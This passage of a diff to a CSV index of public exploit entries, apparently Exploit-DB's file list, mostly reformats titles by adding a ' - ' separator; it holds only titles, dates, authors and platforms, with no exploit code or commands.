+37470,platforms/multiple/webapps/37470.txt,"SWFUpload - 'movieName' Parameter Cross-Site Scripting",2012-06-29,"Nathan Partlan",multiple,webapps,0 37471,platforms/windows/dos/37471.pl,"Zoom Player '.avi' File Divide-By-Zero Denial of Service",2012-07-02,Dark-Puzzle,windows,dos,0 37472,platforms/php/webapps/37472.php,"GetSimple CMS Items Manager Plugin 'php.php' Arbitrary File Upload",2012-07-02,"Sammy FORGIT",php,webapps,0 37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x Language Switcher ModuleMultiple Cross-Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0 @@ -33833,14 +33833,14 @@ id,file,description,date,author,platform,type,port 37478,platforms/multiple/dos/37478.txt,"plow '.plowrc' File Buffer Overflow",2012-07-03,"Jean Pascal Pereira",multiple,dos,0 37479,platforms/php/webapps/37479.txt,"Classified Ads Script PHP 'admin.php' Multiple SQL Injection",2012-07-04,snup,php,webapps,0 37480,platforms/windows/dos/37480.pl,"Solar FTP Server Denial of Service",2012-07-05,coolkaveh,windows,dos,0 -37481,platforms/php/webapps/37481.txt,"WordPress SocialFit Plugin 'msg' Parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 -37482,platforms/php/webapps/37482.txt,"WordPress custom tables Plugin 'key' Parameter Cross-Site Scripting",2012-07-03,"Sammy FORGIT",php,webapps,0 -37483,platforms/php/webapps/37483.txt,"WordPress church_admin Plugin 'id' parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 +37481,platforms/php/webapps/37481.txt,"WordPress SocialFit Plugin - 'msg' Parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 +37482,platforms/php/webapps/37482.txt,"WordPress custom tables Plugin - 'key' Parameter Cross-Site Scripting",2012-07-03,"Sammy FORGIT",php,webapps,0 +37483,platforms/php/webapps/37483.txt,"WordPress church_admin Plugin - 'id' parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 37484,platforms/php/webapps/37484.txt,"WordPress Knews Multilingual Newsletters Plugin Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 37485,platforms/php/webapps/37485.txt,"WordPress PHPFreeChat Plugin - 'url' Parameter Cross-Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0 -37486,platforms/php/webapps/37486.txt,"sflog! 'section' Parameter Local File Inclusion",2012-07-06,dun,php,webapps,0 +37486,platforms/php/webapps/37486.txt,"sflog! - 'section' Parameter Local File Inclusion",2012-07-06,dun,php,webapps,0 37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service",2012-07-06,IOactive,multiple,dos,0 -37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0 +37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Parameter URI Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0 37489,platforms/php/webapps/37489.txt,"MGB - Multiple Cross-Site Scripting / SQL Injection",2012-07-09,"Stefan Schurtz",php,webapps,0 37546,platforms/linux/dos/37546.pl,"File Roller v3.4.1 - DoS PoC",2015-07-09,Arsyntex,linux,dos,0 37563,platforms/php/webapps/37563.html,"WordPress G-Lock Double Opt-in Manager Plugin SQL Injection",2012-08-01,BEASTIAN,php,webapps,0 @@ -33855,8 +33855,8 @@ id,file,description,date,author,platform,type,port 37503,platforms/php/webapps/37503.txt,"Event Calender PHP Multiple Input Validation Vulnerabilities",2012-07-16,snup,php,webapps,0 37504,platforms/android/webapps/37504.py,"AirDroid - Unauthenticated Arbitrary File Upload",2015-07-06,"Parsa Adib",android,webapps,8888 37505,platforms/php/webapps/37505.txt,"Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities",2012-07-16,"Benjamin Kunz Mejri",php,webapps,0 -37506,platforms/php/webapps/37506.php,"WordPress Post Recommendations Plugin 'abspath' Parameter Remote File Inclusion",2012-07-16,"Sammy FORGIT",php,webapps,0 -37507,platforms/php/webapps/37507.txt,"web@all 'name' Parameter Cross-Site Scripting",2012-07-16,"Sammy FORGIT",php,webapps,0 +37506,platforms/php/webapps/37506.php,"WordPress Post Recommendations Plugin - 'abspath' Parameter Remote File Inclusion",2012-07-16,"Sammy FORGIT",php,webapps,0 +37507,platforms/php/webapps/37507.txt,"web@all - 'name' Parameter Cross-Site Scripting",2012-07-16,"Sammy FORGIT",php,webapps,0 37508,platforms/php/webapps/37508.txt,"Rama Zeiten CMS 'download.php' Remote File Disclosure",2012-07-16,"Sammy FORGIT",php,webapps,0 37509,platforms/php/webapps/37509.txt,"EmbryoCore CMS 1.03 - 'loadcss.php' Multiple Directory Traversal Vulnerabilities",2012-07-16,"Sammy FORGIT",php,webapps,0 37510,platforms/windows/remote/37510.c,"Google Chrome 19.0.1084.52 - 'metro_driver.dll' DLL Loading Arbitrary Code Execution",2012-06-26,"Moshe Zioni",windows,remote,0 @@ -33868,7 +33868,7 @@ id,file,description,date,author,platform,type,port 37516,platforms/hardware/webapps/37516.txt,"Dlink DSL-2750u and DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0 37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W miniupnpd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900 37518,platforms/multiple/dos/37518.html,"Arora Browser Remote Denial of Service",2012-07-18,t3rm!n4t0r,multiple,dos,0 -37519,platforms/php/webapps/37519.txt,"Joomla! 'com_hello' Component 'controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0 +37519,platforms/php/webapps/37519.txt,"Joomla! 'com_hello' Component - 'controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0 37520,platforms/php/webapps/37520.txt,"Maian Survey 'index.php' URI Redirection and Local File Inclusion",2012-07-20,PuN!Sh3r,php,webapps,0 37521,platforms/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0 37522,platforms/php/webapps/37522.txt,"WordPress chenpress Plugin Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0 @@ -33886,10 +33886,10 @@ id,file,description,date,author,platform,type,port 37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",2015-07-08,Metasploit,multiple,remote,0 37537,platforms/php/webapps/37537.txt,"phpProfiles Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0 37538,platforms/linux/dos/37538.py,"ISC DHCP 4.x Multiple Denial of Service Vulnerabilities",2012-07-25,"Markus Hietava",linux,dos,0 -37539,platforms/php/webapps/37539.txt,"REDAXO 'subpage' Parameter Cross-Site Scripting",2012-07-25,"High-Tech Bridge SA",php,webapps,0 -37540,platforms/php/webapps/37540.txt,"Joomla Odudeprofile component 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0 +37539,platforms/php/webapps/37539.txt,"REDAXO - 'subpage' Parameter Cross-Site Scripting",2012-07-25,"High-Tech Bridge SA",php,webapps,0 +37540,platforms/php/webapps/37540.txt,"Joomla Odudeprofile component - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0 37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0 -37542,platforms/windows/remote/37542.html,"BarCodeWiz 'BarcodeWiz.dll' ActiveX Control 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0 +37542,platforms/windows/remote/37542.html,"BarCodeWiz 'BarcodeWiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0 37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Function Local Information Disclosure",2012-07-26,"Jay Fenlason",linux,local,0 37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Parameter URI Redirection",2012-07-29,"Aung Khant",php,webapps,0 37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0 @@ -33897,8 +33897,8 @@ id,file,description,date,author,platform,type,port 37549,platforms/cgi/webapps/37549.txt,"Scrutinizer 9.0.1.19899 HTTP Authentication Bypass",2012-07-30,"Mario Ceballos",cgi,webapps,0 37550,platforms/jsp/webapps/37550.txt,"DataWatch Monarch Business Intelligence Multiple Input Validation Vulnerabilities",2012-07-31,"Raymond Rizk",jsp,webapps,0 37551,platforms/php/webapps/37551.txt,"phpBB - Multiple SQL Injection",2012-07-28,HauntIT,php,webapps,0 -37552,platforms/php/webapps/37552.txt,"JW Player 'playerready' Parameter Cross-Site Scripting",2012-07-29,MustLive,php,webapps,0 -37553,platforms/php/webapps/37553.txt,"eNdonesia 'cid' Parameter SQL Injection",2012-07-29,Crim3R,php,webapps,0 +37552,platforms/php/webapps/37552.txt,"JW Player - 'playerready' Parameter Cross-Site Scripting",2012-07-29,MustLive,php,webapps,0 +37553,platforms/php/webapps/37553.txt,"eNdonesia - 'cid' Parameter SQL Injection",2012-07-29,Crim3R,php,webapps,0 37554,platforms/php/webapps/37554.txt,"Limny 'index.php' Multiple SQL Injection",2012-07-31,L0n3ly-H34rT,php,webapps,0 37555,platforms/java/webapps/37555.txt,"ManageEngine Applications Manager Multiple SQL Injection",2012-08-01,"Ibrahim El-Sayed",java,webapps,0 37556,platforms/php/webapps/37556.txt,"Distimo Monitor Multiple Cross-Site Scripting Vulnerabilities",2012-08-01,"Benjamin Kunz Mejri",php,webapps,0 @@ -33909,10 +33909,10 @@ id,file,description,date,author,platform,type,port 37562,platforms/multiple/dos/37562.pl,"NTPD MON_GETLIST Query Amplification Denial of Service",2015-07-10,"Todor Donev",multiple,dos,123 37567,platforms/php/webapps/37567.txt,"tekno.Portal 0.1b 'link.php' SQL Injection",2012-08-01,Socket_0x03,php,webapps,0 37568,platforms/windows/dos/37568.pl,"VLC Media Player '.3gp' File Divide-By-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0 -37569,platforms/multiple/webapps/37569.txt,"ntop 'arbfile' Parameter Cross-Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps,0 +37569,platforms/multiple/webapps/37569.txt,"ntop - 'arbfile' Parameter Cross-Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps,0 37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 Remote Post-Authentication Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0 37571,platforms/multiple/webapps/37571.txt,"Zenoss 3.2.1 - Multiple Security Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0 -37572,platforms/php/webapps/37572.txt,"Elefant CMS 'id' Parameter Cross-Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0 +37572,platforms/php/webapps/37572.txt,"Elefant CMS - 'id' Parameter Cross-Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0 37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0 37575,platforms/php/webapps/37575.txt,"Joomla! 'com_photo' module Multiple SQL Injection",2012-08-06,"Chokri Ben Achor",php,webapps,0 37576,platforms/linux/remote/37576.cpp,"Alligra Calligra Heap Based Buffer Overflow",2012-08-07,"Charlie Miller",linux,remote,0 @@ -33922,11 +33922,11 @@ id,file,description,date,author,platform,type,port 37580,platforms/php/webapps/37580.txt,"Open Constructor confirm.php q Parameter XSS",2012-08-04,"Lorenzo Cantoni",php,webapps,0 37581,platforms/php/webapps/37581.txt,"Dir2web system/src/dispatcher.php oid Parameter SQL Injection",2012-08-07,"Daniel Correa",php,webapps,0 37582,platforms/php/webapps/37582.py,"Mibew Messenger 1.6.4 - 'threadid' Parameter SQL Injection",2012-08-05,"Ucha Gobejishvili",php,webapps,0 -37583,platforms/php/webapps/37583.txt,"YT-Videos Script 'id' Parameter SQL Injection",2012-08-06,3spi0n,php,webapps,0 +37583,platforms/php/webapps/37583.txt,"YT-Videos Script - 'id' Parameter SQL Injection",2012-08-06,3spi0n,php,webapps,0 37584,platforms/php/webapps/37584.txt,"TCExam 11.2.x - /admin/code/tce_edit_answer.php Multiple Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x - /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 37586,platforms/php/webapps/37586.php,"PBBoard Authentication Bypass",2012-08-07,i-Hmx,php,webapps,0 -37587,platforms/php/webapps/37587.txt,"GetSimple 'path' Parameter Local File Inclusion",2012-08-07,PuN!Sh3r,php,webapps,0 +37587,platforms/php/webapps/37587.txt,"GetSimple - 'path' Parameter Local File Inclusion",2012-08-07,PuN!Sh3r,php,webapps,0 37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80 37589,platforms/java/webapps/37589.txt,"ConcourseSuite Multiple Cross-Site Scripting and Cross Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0 37590,platforms/php/webapps/37590.txt,"PHPList 2.10.18 - 'unconfirmed' Parameter Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",php,webapps,0 @@ -33972,10 +33972,10 @@ id,file,description,date,author,platform,type,port 37635,platforms/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host Local File Inclusion",2012-08-10,L0n3ly-H34rT,php,webapps,0 37636,platforms/php/webapps/37636.txt,"ShopperPress WordPress Theme - SQL Injection / Cross-Site Scripting",2012-08-02,"Benjamin Kunz Mejri",php,webapps,0 37637,platforms/php/webapps/37637.pl,"Elastix 2.2.0 - 'graph.php' Local File Inclusion",2012-08-17,cheki,php,webapps,0 -37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 'SHOWTPL' Parameter Cross-Site Scripting",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0 +37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 - 'SHOWTPL' Parameter Cross-Site Scripting",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0 37639,platforms/multiple/dos/37639.html,"Mozilla Firefox Remote Denial of Service",2012-08-17,"Jean Pascal Pereira",multiple,dos,0 37640,platforms/windows/dos/37640.pl,"Divx Player Denial of Service",2012-08-20,Dark-Puzzle,windows,dos,0 -37641,platforms/php/webapps/37641.txt,"JPM Article Blog Script 6 'tid' Parameter Cross-Site Scripting",2012-08-21,Mr.0c3aN,php,webapps,0 +37641,platforms/php/webapps/37641.txt,"JPM Article Blog Script 6 - 'tid' Parameter Cross-Site Scripting",2012-08-21,Mr.0c3aN,php,webapps,0 37642,platforms/php/webapps/37642.txt,"SaltOS 'download.php' Cross-Site Scripting",2012-08-18,"Stefan Schurtz",php,webapps,0 37643,platforms/php/webapps/37643.txt,"IBM Rational ClearQuest 8.0 - Multiple Security Vulnerabilities",2012-08-27,anonymous,php,webapps,0 37644,platforms/php/webapps/37644.txt,"Jara 1.6 - Multiple SQL Injection and Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0 @@ -33986,11 +33986,11 @@ id,file,description,date,author,platform,type,port 37649,platforms/php/webapps/37649.html,"SiNG cms 'password.php' Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 37650,platforms/php/webapps/37650.txt,"1024 CMS 2.1.1 - 'p' Parameter SQL Injection",2012-08-22,kallimero,php,webapps,0 37651,platforms/php/webapps/37651.html,"Monstra - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,php,webapps,0 -37652,platforms/php/webapps/37652.txt,"KindEditor 'name' Parameter Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 +37652,platforms/php/webapps/37652.txt,"KindEditor - 'name' Parameter Cross-Site Scripting",2012-08-23,LiquidWorm,php,webapps,0 37653,platforms/php/webapps/37653.txt,"WordPress Rich Widget Plugin Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 37654,platforms/php/webapps/37654.txt,"WordPress Monsters Editor for WP Super Edit Plugin Arbitrary File Upload",2012-08-22,Crim3R,php,webapps,0 37655,platforms/windows/remote/37655.c,"Adobe Pixel Bender Toolkit2 - 'tbbmalloc.dll' Multiple DLL Loading Code Execution Vulnerabilities",2012-08-23,coolkaveh,windows,remote,0 -37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro 'page' Parameter Local File Inclusion",2012-08-23,"Corrado Liotta",php,webapps,0 +37656,platforms/php/webapps/37656.txt,"PHP Web Scripts Ad Manager Pro - 'page' Parameter Local File Inclusion",2012-08-23,"Corrado Liotta",php,webapps,0 37657,platforms/windows/local/37657.txt,"Microsoft Word Local Machine Zone Remote Code Execution",2015-07-20,"Eduardo Braun Prado",windows,local,0 37688,platforms/php/remote/37688.txt,"PHP 'header()' HTTP Header Injection",2011-10-06,"Mr. Tokumaru",php,remote,0 37659,platforms/php/webapps/37659.txt,"phpVibe < 4.20 Stored XSS",2015-07-20,"Filippos Mastrogiannis",php,webapps,0 @@ -34003,16 +34003,16 @@ id,file,description,date,author,platform,type,port 37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0 37670,platforms/osx/local/37670.sh,"OS X 10.10 - DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0 37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross-Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0 -37672,platforms/php/webapps/37672.txt,"JW Player 'logo.link' Parameter Cross-Site Scripting",2012-08-29,MustLive,php,webapps,0 +37672,platforms/php/webapps/37672.txt,"JW Player - 'logo.link' Parameter Cross-Site Scripting",2012-08-29,MustLive,php,webapps,0 37673,platforms/windows/dos/37673.html,"Microsoft Indexing Service - 'ixsso.dll' ActiveX Control Denial of Service",2012-08-24,coolkaveh,windows,dos,0 -37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro 'page' Parameter Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 -37675,platforms/php/webapps/37675.txt,"Joomla! Komento Component 'cid' Parameter SQL Injection",2012-08-27,Crim3R,php,webapps,0 +37674,platforms/php/webapps/37674.txt,"PHP Web Scripts Text Exchange Pro - 'page' Parameter Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 +37675,platforms/php/webapps/37675.txt,"Joomla! Komento Component - 'cid' Parameter SQL Injection",2012-08-27,Crim3R,php,webapps,0 37676,platforms/asp/webapps/37676.txt,"Power-eCommerce Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 37677,platforms/php/webapps/37677.txt,"WordPress Finder Plugin - 'order' Parameter Cross-Site Scripting",2012-08-25,Crim3R,php,webapps,0 37678,platforms/asp/webapps/37678.txt,"Web Wiz Forums Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,asp,webapps,0 37679,platforms/php/webapps/37679.txt,"LibGuides Multiple Cross-Site Scripting Vulnerabilities",2012-08-25,Crim3R,php,webapps,0 37680,platforms/php/webapps/37680.txt,"Mihalism Multi Host 'users.php' Cross-Site Scripting",2012-08-25,Explo!ter,php,webapps,0 -37681,platforms/php/webapps/37681.txt,"WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure",2012-08-28,"Jan Van Niekerk",php,webapps,0 +37681,platforms/php/webapps/37681.txt,"WordPress Cloudsafe365 Plugin - 'file' Parameter Remote File Disclosure",2012-08-28,"Jan Van Niekerk",php,webapps,0 37682,platforms/php/webapps/37682.txt,"WordPress Simple:Press Forum Plugin Arbitrary File Upload",2012-08-28,"Iranian Dark Coders",php,webapps,0 37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 37684,platforms/php/webapps/37684.html,"PrestaShop 1.4.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0 @@ -34024,7 +34024,7 @@ id,file,description,date,author,platform,type,port 37691,platforms/php/webapps/37691.txt,"SugarCRM Community Edition Multiple Information Disclosure Vulnerabilities",2012-08-31,"Brendan Coles",php,webapps,0 37692,platforms/multiple/dos/37692.pl,"aMSN Remote Denial of Service",2006-01-01,"Braulio Miguel Suarez Urquijo",multiple,dos,0 37693,platforms/php/webapps/37693.txt,"Sitemax Maestro SQL Injection and Local File Inclusion",2012-09-03,AkaStep,php,webapps,0 -37694,platforms/php/webapps/37694.txt,"Wiki Web Help 'configpath' Parameter Remote File Inclusion",2012-08-04,L0n3ly-H34rT,php,webapps,0 +37694,platforms/php/webapps/37694.txt,"Wiki Web Help - 'configpath' Parameter Remote File Inclusion",2012-08-04,L0n3ly-H34rT,php,webapps,0 37695,platforms/php/webapps/37695.txt,"Sciretech Multiple Products - Multiple SQL Injection",2012-09-04,AkaStep,php,webapps,0 37696,platforms/asp/webapps/37696.txt,"Cm3 CMS 'search.asp' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,Crim3R,asp,webapps,0 37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 - 'ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0 @@ -34081,7 +34081,7 @@ id,file,description,date,author,platform,type,port 37746,platforms/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote,0 37754,platforms/php/webapps/37754.txt,"WordPress Candidate Application Form Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 37755,platforms/windows/local/37755.c,"Windows 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0 -37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server 'gtitle' parameter Cross-Site Scripting",2012-03-12,K1P0D,multiple,remote,0 +37947,platforms/multiple/remote/37947.txt,"LiteSpeed Web Server - 'gtitle' parameter Cross-Site Scripting",2012-03-12,K1P0D,multiple,remote,0 37948,platforms/php/webapps/37948.txt,"WordPress Slideshow Plugin Multiple Cross-Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0 37949,platforms/linux/remote/37949.txt,"ModSecurity POST Parameters Security Bypass",2012-10-17,"Bernhard Mueller",linux,remote,0 37950,platforms/php/webapps/37950.txt,"jCore /admin/index.php path Parameter XSS",2012-10-17,"High-Tech Bridge",php,webapps,0 @@ -34116,10 +34116,10 @@ id,file,description,date,author,platform,type,port 37784,platforms/php/webapps/37784.txt,"Pinterestclones Security Bypass and HTML Injection Vulnerabilities",2012-09-08,DaOne,php,webapps,0 37785,platforms/php/webapps/37785.txt,"VICIDIAL Call Center Suite Multiple SQL Injection",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 37786,platforms/php/webapps/37786.txt,"DeltaScripts PHP Links Multiple SQL Injection",2012-09-10,L0n3ly-H34rT,php,webapps,0 -37787,platforms/php/webapps/37787.txt,"WordPress Download Monitor Plugin 'dlsearch' Parameter Cross-Site Scripting",2012-08-30,"Chris Cooper",php,webapps,0 +37787,platforms/php/webapps/37787.txt,"WordPress Download Monitor Plugin - 'dlsearch' Parameter Cross-Site Scripting",2012-08-30,"Chris Cooper",php,webapps,0 37788,platforms/linux/remote/37788.py,"libguac Remote Buffer Overflow",2012-09-11,"Michael Jumper",linux,remote,0 37789,platforms/php/webapps/37789.txt,"Openfiler 2.3 - Multiple Cross-Site Scripting and Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",php,webapps,0 -37790,platforms/php/webapps/37790.txt,"FBDj 'id' Parameter SQL Injection",2012-09-11,"TUNISIAN CYBER",php,webapps,0 +37790,platforms/php/webapps/37790.txt,"FBDj - 'id' Parameter SQL Injection",2012-09-11,"TUNISIAN CYBER",php,webapps,0 37791,platforms/multiple/webapps/37791.txt,"Atlassian Confluence 3.4.x Error Page Cross-Site Scripting",2012-09-12,"D. Niedermaier",multiple,webapps,0 37792,platforms/android/remote/37792.txt,"Google Chrome for Android com.android.browser.application_id Intent Extra Data XSS",2012-09-12,"Artem Chaykin",android,remote,0 37793,platforms/android/remote/37793.txt,"Google Chrome for Android Multiple file:: URL Handler Local Downloaded Content Disclosure",2012-09-12,"Artem Chaykin",android,remote,0 @@ -34129,9 +34129,9 @@ id,file,description,date,author,platform,type,port 37941,platforms/php/webapps/37941.txt,"SenseSites CommonSense CMS special.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS article.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0 37943,platforms/php/webapps/37943.txt,"WebTitan 'logs-x.php' Directory Traversal",2012-10-20,"Richard Conner",php,webapps,0 -37944,platforms/php/webapps/37944.txt,"vBSEO 'u' parameter Cross-Site Scripting",2012-06-16,MegaMan,php,webapps,0 +37944,platforms/php/webapps/37944.txt,"vBSEO - 'u' parameter Cross-Site Scripting",2012-06-16,MegaMan,php,webapps,0 37945,platforms/php/webapps/37945.txt,"SilverStripe 2.4.x - 'BackURL' Parameter URI Redirection",2012-10-15,"Aung Khant",php,webapps,0 -37946,platforms/php/webapps/37946.txt,"WordPress Crayon Syntax Highlighter Plugin 'wp_load' Parameter Remote File Inclusion",2012-10-15,"Charlie Eriksen",php,webapps,0 +37946,platforms/php/webapps/37946.txt,"WordPress Crayon Syntax Highlighter Plugin - 'wp_load' Parameter Remote File Inclusion",2012-10-15,"Charlie Eriksen",php,webapps,0 38001,platforms/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22 37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - .pls Local Crash PoC",2015-08-17,St0rn,windows,dos,0 37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor (.qeditor) 4.0g- .qse SEH Based Buffer Overflow (ASLR & SAFESEH bypass)",2015-08-17,St0rn,windows,local,0 @@ -34140,7 +34140,7 @@ id,file,description,date,author,platform,type,port 37802,platforms/jsp/webapps/37802.html,"IFOBS 'regclientprint.jsp' Multiple HTML Injection Vulnerabilities",2012-09-15,MustLive,jsp,webapps,0 37803,platforms/hardware/remote/37803.txt,"CoSoSys Endpoint Protector Predictable Password Generation",2012-09-17,"Christopher Campbell",hardware,remote,0 37804,platforms/php/webapps/37804.txt,"minimal Gallery 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2012-09-17,ayastar,php,webapps,0 -37805,platforms/php/webapps/37805.txt,"TAGWORX.CMS 'cid' Parameter SQL Injection",2012-09-18,Crim3R,php,webapps,0 +37805,platforms/php/webapps/37805.txt,"TAGWORX.CMS - 'cid' Parameter SQL Injection",2012-09-18,Crim3R,php,webapps,0 37806,platforms/cgi/webapps/37806.txt,"AxisInternet VoIP Manager Multiple Cross-Site Scripting Vulnerabilities",2012-09-18,"Benjamin Kunz Mejri",cgi,webapps,0 37807,platforms/php/webapps/37807.txt,"VBulletin 4.1.12 - 'blog_plugin_useradmin.php' SQL Injection",2012-09-18,Am!r,php,webapps,0 37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0 @@ -34163,14 +34163,14 @@ id,file,description,date,author,platform,type,port 37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure",2012-10-09,"Brad Spengler",linux,local,0 37938,platforms/php/webapps/37938.txt,"OpenX /www/admin/plugin-index.php parent Parameter XSS",2012-10-10,"High-Tech Bridge",php,webapps,0 37939,platforms/php/webapps/37939.txt,"FileContral - Local File Inclusion / Local File Disclosure",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0 -38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0 +38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin - 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0 38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80 37833,platforms/php/webapps/37833.txt,"YCommerce - Multiple SQL Injection",2012-09-21,"Ricardo Almeida",php,webapps,0 37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 Unspecified Remote Code Execution",2012-09-24,kb,linux,remote,0 37835,platforms/php/webapps/37835.html,"WordPress 3.4.2 - Cross Site Request Forgery",2012-09-22,AkaStep,php,webapps,0 -37836,platforms/php/webapps/37836.txt,"WordPress Token Manager Plugin 'tid' Parameter Cross-Site Scripting",2012-09-25,TheCyberNuxbie,php,webapps,0 +37836,platforms/php/webapps/37836.txt,"WordPress Token Manager Plugin - 'tid' Parameter Cross-Site Scripting",2012-09-25,TheCyberNuxbie,php,webapps,0 37837,platforms/php/webapps/37837.html,"WordPress Sexy Add Template Plugin Cross Site Request Forgery",2012-09-22,the_cyber_nuxbie,php,webapps,0 -37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart 'SearchFor' 